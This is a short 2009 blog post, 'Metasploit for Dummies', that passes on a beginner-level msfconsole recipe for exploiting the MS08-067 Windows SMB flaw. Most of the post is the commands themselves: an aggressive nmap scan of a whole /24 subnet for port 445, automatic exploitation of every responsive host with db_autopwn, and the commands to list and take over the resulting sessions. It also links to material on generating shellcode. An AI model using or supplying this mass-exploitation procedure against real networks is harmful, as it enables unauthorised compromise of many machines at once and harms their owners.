Sunday, February 15, 2009

Metasploit for Dummies

Metasploit are giving out a very simple step-by-step sample for exploiting the latest MS08-067 vulnerability from the msfconsole.

The below steps will scan hosts on subnet AAA.BBB.CCC.0/24 for open port 445, and launch the exploit against the active hosts.

msf > load db_sqlite3
msf > db_create
msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24
msf > db_autopwn -e -p -b -m ms08_067

Then view the opened sessions by:
msf > sessions -l
msf > sessions -i 1

http://blog.metasploit.com/2009/02/metasploit-mass-exploitation-for.html

For writing shellcode, check Generating Shellcode Using Metasploit

No comments: